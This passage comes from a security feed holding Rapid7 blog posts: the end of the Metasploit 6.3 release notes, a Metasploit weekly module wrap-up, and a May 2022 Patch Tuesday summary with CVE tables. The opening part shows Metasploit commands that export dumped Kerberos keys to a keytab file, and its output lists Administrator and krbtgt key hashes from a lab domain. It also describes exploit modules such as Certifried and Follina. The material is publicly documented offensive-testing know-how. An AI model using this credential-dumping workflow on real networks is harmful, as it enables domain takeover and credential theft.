[*] Auxiliary module execution completed\n \n\nThese Kerberos encryption keys can then be exported to a new Keytab file with the `admin/kerberos/keytab` module:\n \n \n # Export to keytab\n msf6 auxiliary(gather/windows_secrets_dump) > use admin/kerberos/keytab\n msf6 auxiliary(admin/kerberos/keytab) > run action=EXPORT keytab_file=./example.keytab\n [+] keytab saved to ./example.keytab\n Keytab entries\n ==============\n \n kvno type principal hash date\n ---- ---- --------- ---- ----\n 1 1 (DES_CBC_CRC) WIN11-DC3$@adf3.local 3e5d83fe4594f261 1970-01-01 01:00:00 +0100\n 1 17 (AES128) ADF3\\DC3$@adf3.local 967ccd1ffb9bff7900464b6ea383ee5b 1970-01-01 01:00:00 +0100\n 1 3 (DES_CBC_MD5) ADF3\\DC3$@adf3.local 62336164643537303830373630643133 1970-01-01 01:00:00 +0100\n 1 18 (AES256) Administrator@adf3.local 56c3bf6629871a4e4b8ec894f37489e823bbaecc2a0a4a5749731afa9d158e01 1970-01-01 01:00:00 +0100\n 1 17 (AES128) Administrator@adf3.local df990c21c4e8ea502efbbca3aae435ea 1970-01-01 01:00:00 +0100\n 1 3 (DES_CBC_MD5) Administrator@adf3.local ad49d9d92f5da170 1970-01-01 01:00:00 +0100\n 1 1 (DES_CBC_CRC) Administrator@adf3.local ad49d9d92f5da170 1970-01-01 01:00:00 +0100\n 1 18 (AES256) krbtgt@adf3.local e1c5500ffb883e713288d8037651821b9ecb0dfad89e01d1b920fe136879e33c 1970-01-01 01:00:00 +0100\n 1 17 (AES128) krbtgt@adf3.local ba87b2bc064673da39f40d37f9daa9da 1970-01-01 01:00:00 +0100\n 1 3 (DES_CBC_MD5) krbtgt@adf3.local 3ddf2f627c4cbcdc 1970-01-01 01:00:00 +0100\n ... ommitted ...\n [*] Auxiliary module execution completed\n \n\nOnce the new Keytab file is created, modify Wireshark to use the exported encryption keys in `Edit -> Preferences -> Protocols -> KRB5`, and select `try to decrypt Kerberos blobs`. Now Wireshark will automatically try to decrypt Kerberos blobs \u2014 the blue highlighted lines show Wireshark\u2019s decryption working:\n\n\n\n### Certifried privilege escalation\n\nMetasploit 6.3 adds an auxiliary module that exploits a privilege escalation vulnerability known as Certifried ([CVE-2022\u201326923](<https://attackerkb.com/topics/iigmLeSKp1/cve-2022-26923-aka-certifried?referrer=blog>)) in AD CS. The module will generate a valid certificate impersonating the Domain Controller (DC) computer account, and this certificate is then used to authenticate to the target as the DC account using PKINIT pre-authentication mechanism. The module will get and cache the TGT for this account along with its NTLM hash. Finally, it requests a TGS impersonating a privileged user (Administrator by default). This TGS can then be used by other modules or external tools.\n\n### Updated `show options` support\n\nPrevious to Metasploit 6.3 the `show options` and `show advanced` commands would display a module\u2019s supported options in a single list.\n\nNow module authors can add additional metadata to specify conditions for when options are relevant to the user, such as a particular action or datastore value being set. Metasploit will then logically group these options together when presenting to them to the user:\n\n\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.\n\nThanks to both Rapid7 developers and Metasploit community members for all their hard work on delivering this latest set of Metasploit features, in particular: Alan Foster, Ashley Donaldson, Brendan Watters, Chris Granleese, Christophe de la Fuente, Dean Welch, Grant Willcox, Jack Heysel, Jacquie Harris, Jeffrey Martin, Matthew Mathur, Navya Harika Karaka, Shelby Pace, Simon Janusz, Spencer McIntyre, and Zach Goldman.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-30T14:00:00", "type": "rapid7blog", "title": "Metasploit Framework 6.3 Released", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26923"], "modified": "2023-01-30T14:00:00", "id": "RAPID7BLOG:A8814FA7F7133FA1EBD7461A005D72A1", "href": "https://blog.rapid7.com/2023/01/30/metasploit-framework-6-3-released/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-09-13T15:56:19", "description": "## ICPR Certificate Management\n\n\n\nThis week Metasploit has a new ICPR Certificate Management module from [Oliver Lyak](<https://github.com/ly4k>) and our very own [Spencer McIntyre](<https://github.com/zeroSteiner>), which can be utilized for issuing certificates via Active Directory Certificate Services. It has the capability to issue certificates which is useful in a few contexts including persistence, [ESC1](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>) and as a primitive necessary for exploiting [CVE-2022-26923](<https://cravaterouge.github.io/ad/privesc/2022/05/11/bloodyad-and-CVE-2022-26923.html>). Resulting in the PFX certificate file being stored to loot and is encrypted using a blank password.\n\n## ManageEngine ADAudit Plus and DataSecurity Plus Xnode enum\n\nAnother addition thanks to [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), that brings two new `auxiliary/gather` modules and docs that take advantage of default Xnode credentials ([CVE-2020\u201311532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532>)) in order to enumerate active directory information and other sensitive data via the DataEngine Xnode server (Xnode). Because both modules rely on the same code to interact with Xnode, this change also adds a mixin at `lib/msf/core/auxiliary/manageengine_xnode` that is leveraged by both modules (plus by a third module that will be part of a separate PR). Both modules also come with configuration files to determine what data will be enumerated from Xnode. The [PR](<https://github.com/rapid7/metasploit-framework/pull/16725>) contains even more information on the vulnerable systems and extensive notes!\n\n## New module content (5)\n\n * [ICPR Certificate Management](<https://github.com/rapid7/metasploit-framework/pull/16939>) by [Oliver Lyak](<https://github.com/ly4k>) and [Spencer McIntyre](<https://github.com/zeroSteiner>) \\- This adds a module for issuing certificates via Active Directory Certificate Services, which is useful in a few contexts including persistence and for some specific exploits. The resulting PFX certificate file is stored to the loot and is encrypted using a blank password.\n\n * [ManageEngine ADAudit Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, aka CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [ManageEngine DataSecurity Plus Xnode Enumeration](<https://github.com/rapid7/metasploit-framework/pull/16725>) by [Erik Wynter](<https://github.com/ErikWynter>) and [Sahil Dhar](<https://github.com/sahildhar>), which exploits [CVE-2020-11532](<https://attackerkb.com/topics/2f3mZcIQlN/cve-2020-11532?referrer=blog>) \\- Two new auxiliary/gather modules have been added that take advantage of default Xnode credentials, a.k.a CVE-2020\u201311532, in order to enumerate Active Directory information and other sensitive data via the DataEngine Xnode server. Additionally, a new library has been added to provide reusable functionality for interacting with Xnode servers.\n\n * [Zyxel Firewall SUID Binary Privilege Escalation](<https://github.com/rapid7/metasploit-framework/pull/16786>) by [jbaines-r7](<https://github.com/jbaines-r7>), which exploits [CVE-2022-30526](<https://attackerkb.com/topics/q8X8Km59iU/cve-2022-30526?referrer=blog>) \\- This adds an LPE exploit for Zyxel Firewalls that can allow a user to escalate themselves to root. The vulnerability is identified as CVE-2022-30526 and is due to a suid binary that allows any user to copy files with root permissions.\n\n * [CVE-2022-30190 AKA Follina](<https://github.com/rapid7/metasploit-framework/pull/16734>) by [bwatters-r7](<https://github.com/bwatters-r7>) \\- This updates the exploit for CVE-2022-30190 (A.K.A Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.\n\n## Enhancements and features (4)\n\n * [#16746](<https://github.com/rapid7/metasploit-framework/pull/16746>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This updates the MSSQL login scanner to catch exceptions and continue running.\n\n * [#16900](<https://github.com/rapid7/metasploit-framework/pull/16900>) from [bcoles](<https://github.com/bcoles>) \\- This adds a new `#kill_process` method that supports shell, PowerShell, and Meterpreter sessions on different platforms.\n\n * [#16903](<https://github.com/rapid7/metasploit-framework/pull/16903>) from [bcoles](<https://github.com/bcoles>) \\- This cleans up the enum_shares post modules and adds support for shell sessions.\n\n * [#16959](<https://github.com/rapid7/metasploit-framework/pull/16959>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `time` command has been updated with the `--cpu` and `--memory` profiler options to allow users to get memory and CPU usage profiles when running a command inside `msfconsole`.\n\n## Bugs fixed (5)\n\n * [#16750](<https://github.com/rapid7/metasploit-framework/pull/16750>) from [bojanisc](<https://github.com/bojanisc>) \\- This updates the `exploit/multi/http/jenkins_script_console` module to use the decoder from the `java.util.Base64` class in place of the now-deprecated decoder from the `sun.misc.BASE64Decoder` class, enabling exploitation of newer Jenkins versions.\n\n * [#16869](<https://github.com/rapid7/metasploit-framework/pull/16869>) from [bcoles](<https://github.com/bcoles>) \\- This fixes an issue in the `file_remote_digestmd5()` and `file_remote_digestsha1()` methods where `read_file()` would return an error message instead of the remote file contents. Additionally, the `file_remote_digest*` methods now support more session types, and they have a new `util` option that allows the user to perform the hashing on the remote host instead of downloading the remote file and performing the hashing locally.\n\n * [#16918](<https://github.com/rapid7/metasploit-framework/pull/16918>) from [rbowes-r7](<https://github.com/rbowes-r7>) \\- A bug has been fixed in the module for CVE-2022-30333 whereby if the server responded with a 200 OK response, the module would keep trying to trigger the payload. This would lead to multiple sessions being returned when only one was desired.\n\n * [#16920](<https://github.com/rapid7/metasploit-framework/pull/16920>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A typo has been fixed in _msfvenom that prevented ZSH autocompletion from working when using the `--arch` argument with `msfvenom`.\n\n * [#16955](<https://github.com/rapid7/metasploit-framework/pull/16955>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This fixes an issue in the LDAP query module that would cause issues if the user queried for a field that was populated with binary data.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from\n\nGitHub:\n\n * [Pull Requests 6.2.14...6.2.15][prs-landed]\n * [Full diff 6.2.14...6.2.15][diff]\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo][repo](master branch) for the latest.\n\nTo install fresh without using git, you can use the open-source-only [Nightly Installers][nightly] or the\n\n[binary installers][binary](which also include the commercial edition). \n[binary]: <https://www.rapid7.com/products/metasploit/download.jsp> \n[diff]: <https://github.com/rapid7/metasploit-framework/compare/6.2.14...6.2.15> \n[prs-landed]: [https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:"2022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00"](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-08-25T17%3A06%3A18%2B01%3A00..2022-09-01T12%3A53%3A23-04%3A00%22>) \n[nightly]: <https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers> \n[repo]: <https://github.com/rapid7/metasploit-framework>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-02T19:39:21", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11532", "CVE-2022-26923", "CVE-2022-30190", "CVE-2022-30333", "CVE-2022-30526"], "modified": "2022-09-02T19:39:21", "id": "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "href": "https://blog.rapid7.com/2022/09/02/metasploit-weekly-wrap-up-174/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-17T23:31:00", "description": "\n\nThis month is par for the course in terms of both number and severity of vulnerabilities being patched by Microsoft. That means there\u2019s plenty of work to be done by system and network administrators, as usual. \n\nThere is one 0-day this month: [CVE-2022-26925](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26925>), a Spoofing vulnerability in the Windows Local Security Authority (LSA) subsystem, which allows attackers able to perform a man-in-the-middle attack to force domain controllers to authenticate to the attacker using NTLM authentication. This is very bad news when used in conjunction with an [NTLM relay attack](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>), potentially leading to remote code execution (RCE). This bug affects all supported versions of Windows, but Domain Controllers should be patched on a priority basis before updating other servers.\n\nTwo other CVEs were also publicly disclosed before today\u2019s releases, though they have not yet been seen exploited in the wild. [CVE-2022-22713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22713>) is a denial-of-service vulnerability that affects Hyper-V servers running relatively recent versions of Windows (20H2 and later). [CVE-2022-29972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29972>) is a Critical RCE that affects the Amazon Redshift ODBC driver used by Microsoft\u2019s Self-hosted Integration Runtime (a client agent that enables on-premises data sources to exchange data with cloud services such as Azure Data Factory and Azure Synapse Pipelines). This vulnerability also prompted Microsoft to publish their first guidance-based advisory of the year, ADV220001, indicating their plans to strengthen tenant isolation in their cloud services without actually providing any specific details or actions to be taken by customers.\n\nAll told, 74 CVEs were fixed this month, the vast majority of which affect functionality within the Windows operating system. Other notable vulnerabilities include [CVE-2022-21972](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21972>) and [CVE-2022-23270](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-23270>), critical RCEs in the Point-to-Point Tunneling Protocol. Exploitation requires attackers to win a race condition, which increases the complexity, but if you have any RAS servers in your environment, patch sooner rather than later.\n\n[CVE-2022-26937](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-26937>) carries a CVSSv3 score of 9.8 and affects services using the Windows Network File System (NFS). This can be mitigated by disabling NFSV2 and NFSV3 on the server; however, this may cause compatibility issues, and upgrading is highly recommended.\n\n[CVE-2022-22017](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22017>) is yet another client-side Remote Desktop Protocol (RDP) vulnerability. While not as worrisome as when an RCE affects RDP servers, if a user can be enticed to connect to a malicious RDP server via social engineering tactics, an attacker will gain RCE on their system.\n\nSharepoint Server administrators should be aware of [CVE-2022-29108](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29108>), a post-authentication RCE fixed today. Exchange admins have [CVE-2022-21978](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-21978>) to worry about, which could allow an attacker with elevated privileges on an Exchange server to gain the rights of a Domain Administrator.\n\nA host of Lightweight Directory Access Protocol (LDAP) vulnerabilities were also addressed this month, including [CVE-2022-22012](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22012>) and [CVE-2022-29130](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29130>) \u2013 both RCEs that, thankfully, are only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value.\n\nAlthough there are no browser vulnerabilities this month, two RCEs affecting Excel ([CVE-2022-29109](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29109>) and [CVE-2022-29110](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29110>)) and one Security Feature Bypass affecting Office ([CVE-2022-29107](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-29107>)) mean there is still some endpoint application patching to do.\n\n## Summary charts\n\n\n\n## Summary tables\n\n### Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29972>) | Insight Software: CVE-2022-29972 Magnitude Simba Amazon Redshift ODBC Driver | No | Yes | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29148>) | Visual Studio Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30129>) | Visual Studio Code Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-23267](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23267>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-29117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29117>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-29145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29145>) | .NET and Visual Studio Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-30130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30130>) | .NET Framework Denial of Service Vulnerability | No | No | 3.3 | No \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26935](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26935>) | Windows WLAN AutoConfig Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29121>) | Windows WLAN AutoConfig Service Denial of Service Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-26936](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26936>) | Windows Server Service Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22015](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22015>) | Windows Remote Desktop Protocol (RDP) Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29103>) | Windows Remote Access Connection Manager Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-29132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29132>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-26937](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26937>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-26925](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26925>) | Windows LSA Spoofing Vulnerability | Yes | Yes | 8.1 | Yes \n[CVE-2022-22012](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22012>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-29130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29130>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-22013](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22013>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-22014](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22014>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-29128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29128>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29129>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29137>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-29139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29139>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29141>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | No \n[CVE-2022-26931](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26931>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-26934](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26934>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29112](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29112>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-22011](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22011>) | Windows Graphics Component Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29115>) | Windows Fax Service Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-26926](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26926>) | Windows Address Book Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-22019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22019>) | Remote Procedure Call Runtime Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-21972](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21972>) | Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-23270](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-23270>) | Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-29105](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29105>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.8 | No \n[CVE-2022-29127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29127>) | BitLocker Security Feature Bypass Vulnerability | No | No | 4.2 | Yes \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-21978](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21978>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8.2 | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-29108](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29108>) | Microsoft SharePoint Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29107>) | Microsoft Office Security Feature Bypass Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29109](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29109>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29110](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29110>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-26930](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26930>) | Windows Remote Access Connection Manager Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29125>) | Windows Push Notifications Apps Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29114](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29114>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29140>) | Windows Print Spooler Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29104](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29104>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No \n[CVE-2022-22016](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22016>) | Windows PlayToManager Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-26933](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26933>) | Windows NTFS Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29131>) | Windows LDAP Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29116](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29116>) | Windows Kernel Information Disclosure Vulnerability | No | No | 4.7 | Yes \n[CVE-2022-29133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29133>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29142>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-29106](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29106>) | Windows Hyper-V Shared Virtual Disk Elevation of Privilege Vulnerability | No | No | 7 | Yes \n[CVE-2022-24466](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24466>) | Windows Hyper-V Security Feature Bypass Vulnerability | No | No | 4.1 | Yes \n[CVE-2022-22713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-22713>) | Windows Hyper-V Denial of Service Vulnerability | No | Yes | 5.6 | Yes \n[CVE-2022-26927](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26927>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-29102](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29102>) | Windows Failover Cluster Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-29113](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29113>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-29134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29134>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29120>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29122>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29123>) | Windows Clustered Shared Volume Information Disclosure Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-29138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-29138>) | Windows Clustered Shared Volume Elevation of Privilege Vulnerability | No | No | 7 | Yes 